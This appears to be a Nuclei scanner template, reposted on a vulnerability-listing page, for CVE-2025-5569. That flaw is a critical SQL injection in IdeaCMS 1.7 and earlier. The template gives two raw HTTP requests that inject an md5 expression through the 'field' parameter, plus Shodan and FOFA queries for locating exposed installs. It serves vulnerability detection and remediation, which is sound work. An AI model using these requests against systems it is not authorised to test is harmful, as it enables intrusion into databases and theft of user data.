漏洞描述
IdeaCMS up to 1.7 is vulnerable to SQL injection via the field parameter in article and product query interfaces. This template uses a time-based payload to safely detect the vulnerability.
CVE-2025-5569: IdeaCMS <= 1.7 - SQL Injection
PoC代码[已公开]
id: CVE-2025-5569
info:
name: IdeaCMS <= 1.7 - SQL Injection
author: ritikchaddha
severity: critical
description: |
IdeaCMS up to 1.7 is vulnerable to SQL injection via the field parameter in article and product query interfaces. This template uses a time-based payload to safely detect the vulnerability.
impact: |
Unauthenticated attackers can extract sensitive data from the database through SQL injection in the field parameter, potentially compromising user information and system credentials.
remediation: |
Upgrade IdeaCMS to a version later than 1.7 that properly sanitizes SQL parameters in article and product query interfaces.
reference:
- https://gitee.com/ideacms/ideacms/issues/ICBVWE#note_42016626_link
- https://nvd.nist.gov/vuln/detail/CVE-2025-5569
classification:
epss-score: 0.00604
epss-percentile: 0.69004
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-5569
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
product: IdeaCMS
shodan-query: http.favicon.hash:-1033616879
fofa-query: icon_hash:"-1033616879"
tags: cve,cve2025,ideacms,sqli,vuln
variables:
num: "999999999"
http:
- raw:
- |
GET /api/v1.index.article/getList.html?field=id,md5({{num}})&size=1&cat=3&time_stamp=1781864476 HTTP/1.1
Host: {{Hostname}}
- |
GET /api/v1.index.goods/getList.html?field=id,md5({{num}})&activity_type=hot&time_stamp=1781864476 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- 'id":1'
- 'data":'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022070e0ea719da96e842177d18b27082515d790254803bcd4ca375216d5f446c6a1022100c051fe47ca0927434ecd1cdf664b2bcc02d0f4f3a5bd4fb074c1ae9c693b915a:922c64590222798bb761d5b6d8e72950